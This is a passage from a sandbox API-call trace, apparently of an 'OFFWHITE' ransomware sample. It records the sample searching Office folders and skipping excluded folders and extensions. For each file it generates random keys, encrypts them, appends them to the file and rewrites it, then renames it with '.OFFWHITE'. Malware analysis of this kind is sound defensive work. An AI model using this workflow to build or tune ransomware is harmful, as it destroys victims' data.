out: lpNewFilePointer=0x0) returned 1 [0144.486] ReadFile (in: hFile=0x218, lpBuffer=0x5607c8, nNumberOfBytesToRead=0xbf60, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesRead=0x295d1c0*=0xbf60, lpOverlapped=0x0) returned 1 [0144.490] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.490] WriteFile (in: hFile=0x218, lpBuffer=0x5607c8*, nNumberOfBytesToWrite=0xbf60, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesWritten=0x295d1cc*=0xbf60, lpOverlapped=0x0) returned 1 [0144.490] GetProcessHeap () returned 0x500000 [0144.490] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5607c8 | out: hHeap=0x500000) returned 1 [0144.490] CloseHandle (hObject=0x218) returned 1 [0144.490] GetProcessHeap () returned 0x500000 [0144.490] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0144.490] GetProcessHeap () returned 0x500000 [0144.491] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0144.491] GetProcessHeap () returned 0x500000 [0144.491] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0144.491] GetProcessHeap () returned 0x500000 [0144.491] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0144.491] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.DLL.trx_dll" [0144.491] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.DLL.trx_dll", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.DLL.trx_dll.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.DLL.trx_dll.OFFWHITE" [0144.491] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\grintl32.dll.trx_dll"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.DLL.trx_dll.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\grintl32.dll.trx_dll.offwhite")) returned 1 [0144.492] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd48e100, ftCreationTime.dwHighDateTime=0x1cac7f7, ftLastAccessTime.dwLowDateTime=0xeedf6c30, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xbd48e100, ftLastWriteTime.dwHighDateTime=0x1cac7f7, nFileSizeHigh=0x0, nFileSizeLow=0x3d960, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="GRINTL32.REST.trx_dll", cAlternateFileName="GRINTL~2.TRX")) returned 1 [0144.492] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2=".") returned 1 [0144.492] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="..") returned 1 [0144.492] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="...") returned 1 [0144.492] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="windows") returned -1 [0144.492] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="$recycle.bin") returned 1 [0144.492] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="rsa") returned -1 [0144.492] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="ntuser.dat") returned -1 [0144.492] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="programdata") returned -1 [0144.492] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="appdata") returned 1 [0144.492] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="program files") returned -1 [0144.492] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="program files (x86)") returned -1 [0144.492] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" [0144.492] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpString2="GRINTL32.REST.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.REST.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.REST.trx_dll" [0144.492] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.492] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.492] PathFindExtensionW (pszPath="GRINTL32.REST.trx_dll") returned=".trx_dll" [0144.492] lstrcmpiW (lpString1=".trx_dll", lpString2=".exe") returned 1 [0144.492] lstrcmpiW (lpString1=".trx_dll", lpString2=".log") returned 1 [0144.492] lstrcmpiW (lpString1=".trx_dll", lpString2=".cab") returned 1 [0144.492] lstrcmpiW (lpString1=".trx_dll", lpString2=".cmd") returned 1 [0144.492] lstrcmpiW (lpString1=".trx_dll", lpString2=".com") returned 1 [0144.492] lstrcmpiW (lpString1=".trx_dll", lpString2=".cpl") returned 1 [0144.493] lstrcmpiW (lpString1=".trx_dll", lpString2=".ini") returned 1 [0144.493] lstrcmpiW (lpString1=".trx_dll", lpString2=".dll") returned 1 [0144.493] lstrcmpiW (lpString1=".trx_dll", lpString2=".url") returned -1 [0144.493] lstrcmpiW (lpString1=".trx_dll", lpString2=".ttf") returned -1 [0144.493] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp3") returned 1 [0144.493] lstrcmpiW (lpString1=".trx_dll", lpString2=".pif") returned 1 [0144.493] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp4") returned 1 [0144.493] lstrcmpiW (lpString1=".trx_dll", lpString2=".OFFWHITE") returned 1 [0144.493] lstrcmpiW (lpString1=".trx_dll", lpString2=".msi") returned 1 [0144.493] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0144.493] GetProcessHeap () returned 0x500000 [0144.493] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52ea30 [0144.493] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\grintl32.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0144.494] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=252256) returned 1 [0144.494] GetProcessHeap () returned 0x500000 [0144.494] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0144.494] GetProcessHeap () returned 0x500000 [0144.494] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0144.494] GetProcessHeap () returned 0x500000 [0144.494] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0144.494] GetProcessHeap () returned 0x500000 [0144.494] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0144.494] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.495] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.495] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0144.495] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.495] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.495] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0144.495] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.495] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.495] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295cf90*=0x100) returned 1 [0144.495] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.495] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.495] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0144.495] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x3d960, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.496] SetLastError (dwErrCode=0x0) [0144.496] WriteFile (in: hFile=0x218, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0144.498] GetLastError () returned 0x0 [0144.499] GetLastError () returned 0x0 [0144.499] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x3da60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.499] WriteFile (in: hFile=0x218, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0144.499] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x3db60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.499] WriteFile (in: hFile=0x218, lpBuffer=0x52ea30*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x52ea30*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0144.499] GetProcessHeap () returned 0x500000 [0144.499] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x3d960) returned 0x5607c8 [0144.499] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.499] ReadFile (in: hFile=0x218, lpBuffer=0x5607c8, nNumberOfBytesToRead=0x3d960, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesRead=0x295d1c0*=0x3d960, lpOverlapped=0x0) returned 1 [0144.518] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.518] WriteFile (in: hFile=0x218, lpBuffer=0x5607c8*, nNumberOfBytesToWrite=0x3d960, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesWritten=0x295d1cc*=0x3d960, lpOverlapped=0x0) returned 1 [0144.520] GetProcessHeap () returned 0x500000 [0144.520] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5607c8 | out: hHeap=0x500000) returned 1 [0144.520] CloseHandle (hObject=0x218) returned 1 [0144.520] GetProcessHeap () returned 0x500000 [0144.520] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0144.520] GetProcessHeap () returned 0x500000 [0144.520] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0144.520] GetProcessHeap () returned 0x500000 [0144.520] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0144.520] GetProcessHeap () returned 0x500000 [0144.520] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0144.520] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.REST.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.REST.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.REST.trx_dll" [0144.520] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.REST.trx_dll", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.REST.trx_dll.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.REST.trx_dll.OFFWHITE" [0144.520] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\grintl32.rest.trx_dll"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.REST.trx_dll.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\grintl32.rest.trx_dll.offwhite")) returned 1 [0144.521] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1be9a700, ftCreationTime.dwHighDateTime=0x1caca12, ftLastAccessTime.dwLowDateTime=0xeee1cd90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x1be9a700, ftLastWriteTime.dwHighDateTime=0x1caca12, nFileSizeHigh=0x0, nFileSizeLow=0x49f60, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="MAPIR.DLL.trx_dll", cAlternateFileName="MAPIRD~1.TRX")) returned 1 [0144.521] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2=".") returned 1 [0144.521] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="..") returned 1 [0144.521] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="...") returned 1 [0144.521] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="windows") returned -1 [0144.521] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="$recycle.bin") returned 1 [0144.521] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="rsa") returned -1 [0144.522] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="ntuser.dat") returned -1 [0144.522] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="programdata") returned -1 [0144.522] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="appdata") returned 1 [0144.522] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="program files") returned -1 [0144.522] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="program files (x86)") returned -1 [0144.522] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" [0144.522] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpString2="MAPIR.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MAPIR.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MAPIR.DLL.trx_dll" [0144.522] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.522] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.522] PathFindExtensionW (pszPath="MAPIR.DLL.trx_dll") returned=".trx_dll" [0144.522] lstrcmpiW (lpString1=".trx_dll", lpString2=".exe") returned 1 [0144.522] lstrcmpiW (lpString1=".trx_dll", lpString2=".log") returned 1 [0144.522] lstrcmpiW (lpString1=".trx_dll", lpString2=".cab") returned 1 [0144.522] lstrcmpiW (lpString1=".trx_dll", lpString2=".cmd") returned 1 [0144.522] lstrcmpiW (lpString1=".trx_dll", lpString2=".com") returned 1 [0144.522] lstrcmpiW (lpString1=".trx_dll", lpString2=".cpl") returned 1 [0144.522] lstrcmpiW (lpString1=".trx_dll", lpString2=".ini") returned 1 [0144.522] lstrcmpiW (lpString1=".trx_dll", lpString2=".dll") returned 1 [0144.522] lstrcmpiW (lpString1=".trx_dll", lpString2=".url") returned -1 [0144.522] lstrcmpiW (lpString1=".trx_dll", lpString2=".ttf") returned -1 [0144.522] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp3") returned 1 [0144.522] lstrcmpiW (lpString1=".trx_dll", lpString2=".pif") returned 1 [0144.522] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp4") returned 1 [0144.522] lstrcmpiW (lpString1=".trx_dll", lpString2=".OFFWHITE") returned 1 [0144.522] lstrcmpiW (lpString1=".trx_dll", lpString2=".msi") returned 1 [0144.522] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0144.523] GetProcessHeap () returned 0x500000 [0144.523] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52ea40 [0144.523] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MAPIR.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\mapir.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0144.528] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=302944) returned 1 [0144.528] GetProcessHeap () returned 0x500000 [0144.528] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0144.528] GetProcessHeap () returned 0x500000 [0144.528] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0144.528] GetProcessHeap () returned 0x500000 [0144.528] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0144.528] GetProcessHeap () returned 0x500000 [0144.528] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0144.528] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.528] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.528] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0144.528] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.528] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.529] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0144.529] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.529] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.529] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295cf90*=0x100) returned 1 [0144.529] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.529] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.529] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0144.529] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x49f60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.529] SetLastError (dwErrCode=0x0) [0144.529] WriteFile (in: hFile=0x218, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0144.533] GetLastError () returned 0x0 [0144.533] GetLastError () returned 0x0 [0144.533] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x4a060, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.533] WriteFile (in: hFile=0x218, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0144.533] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x4a160, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.533] WriteFile (in: hFile=0x218, lpBuffer=0x52ea40*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x52ea40*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0144.534] GetProcessHeap () returned 0x500000 [0144.534] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x49f60) returned 0x5607c8 [0144.534] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.534] ReadFile (in: hFile=0x218, lpBuffer=0x5607c8, nNumberOfBytesToRead=0x49f60, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesRead=0x295d1c0*=0x49f60, lpOverlapped=0x0) returned 1 [0144.555] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.555] WriteFile (in: hFile=0x218, lpBuffer=0x5607c8*, nNumberOfBytesToWrite=0x49f60, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesWritten=0x295d1cc*=0x49f60, lpOverlapped=0x0) returned 1 [0144.556] GetProcessHeap () returned 0x500000 [0144.557] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5607c8 | out: hHeap=0x500000) returned 1 [0144.557] CloseHandle (hObject=0x218) returned 1 [0144.557] GetProcessHeap () returned 0x500000 [0144.557] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0144.557] GetProcessHeap () returned 0x500000 [0144.557] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0144.557] GetProcessHeap () returned 0x500000 [0144.559] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0144.560] GetProcessHeap () returned 0x500000 [0144.560] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0144.560] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MAPIR.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MAPIR.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MAPIR.DLL.trx_dll" [0144.560] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MAPIR.DLL.trx_dll", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MAPIR.DLL.trx_dll.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MAPIR.DLL.trx_dll.OFFWHITE" [0144.560] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MAPIR.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\mapir.dll.trx_dll"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MAPIR.DLL.trx_dll.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\mapir.dll.trx_dll.offwhite")) returned 1 [0144.561] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa27f6800, ftCreationTime.dwHighDateTime=0x1cac809, ftLastAccessTime.dwLowDateTime=0xeee1cd90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xa27f6800, ftLastWriteTime.dwHighDateTime=0x1cac809, nFileSizeHigh=0x0, nFileSizeLow=0xc160, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="MOR6INT.REST.trx_dll", cAlternateFileName="MOR6IN~1.TRX")) returned 1 [0144.561] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2=".") returned 1 [0144.561] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="..") returned 1 [0144.561] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="...") returned 1 [0144.561] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="windows") returned -1 [0144.561] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="$recycle.bin") returned 1 [0144.561] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="rsa") returned -1 [0144.561] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="ntuser.dat") returned -1 [0144.561] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="programdata") returned -1 [0144.561] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="appdata") returned 1 [0144.561] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="program files") returned -1 [0144.561] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="program files (x86)") returned -1 [0144.561] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" [0144.561] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpString2="MOR6INT.REST.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MOR6INT.REST.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MOR6INT.REST.trx_dll" [0144.561] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.561] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.561] PathFindExtensionW (pszPath="MOR6INT.REST.trx_dll") 